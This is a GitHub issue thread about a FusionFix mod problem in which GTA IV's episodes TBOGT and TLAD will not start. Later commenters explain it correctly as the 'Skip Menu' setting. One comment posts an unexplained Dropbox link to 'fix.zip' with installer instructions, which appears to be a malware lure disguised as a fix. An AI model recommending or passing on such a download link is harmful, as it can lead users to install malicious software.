### ISSUE TITLE
I can't play or start TBOGT and TLAD

### ISSUE THREAD

**Issue by Combiner212** [ThirteenAG/GTAIV.EFLC.FusionFix#585]
### Game version this happens in

v1.2.0.59

### What area of the game

"The situation I'm facing is that I install the mod normally as it should be, and when I start the game on Steam ('EFLC'), the rights screen appears, followed by a screen saying that the save data couldn't be loaded, that I have no internet connection, and so on. Once I press 'Yes' or 'No,' the game automatically loads Niko's campaign or when the Social Club session starts, so I don't know why this is happening with the mod. Just in case, I extract the file with 7zip and in the normal folder.

### What should happen

![Captura de pantalla 2024-08-26 001323](https://github.com/user-attachments/assets/6433d8d9-11be-4dd2-92d2-f88308c787cc)

### CrashDumps and logs

d

### Last working version

v2.0

### Checklist

- [X] Test in the [latest git build](https://ci.appveyor.com/api/projects/ThirteenAG/gtaiv-eflc-fusionfix/artifacts/GTAIV.EFLC.FusionFix.zip) in case it's already fixed.
- [X] [Search for other reports](https://github.com/ThirteenAG/GTAIV.EFLC.FusionFix/search?q=my+issue&type=issues) of the same issue.
- [X] Include logs or screenshots of issue.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Combiner212** [comment]
"An error occurred. Please try refreshing the page. You can also request help
![Captura de pantalla 2024-08-26 003312](https://github.com/user-attachments/assets/be54216a-9642-4298-a82d-a1c7f16ebb51)

**Comment by IWasForcedToGetThis** [comment]
It seems as though you're dealing with an intended feature called "Skip Menu" which should be called "Saltar Menu" in your copy.
Go to the pause menu in-game once you load into "Niko's campaign", then go to the "game" tab in the pause menu and then either go into EFLC through the "Load" or "New" option or disable "Saltar Menu" so the normal menu in the beginning loads up again.

**Comment by MiesThies** [comment]
Also you can press Shift while the game is booting up. That should bring you to the main menu screen regardless of your "Skip Menu" settings. From there you should be able to choose and start TBoGT / TLAD.
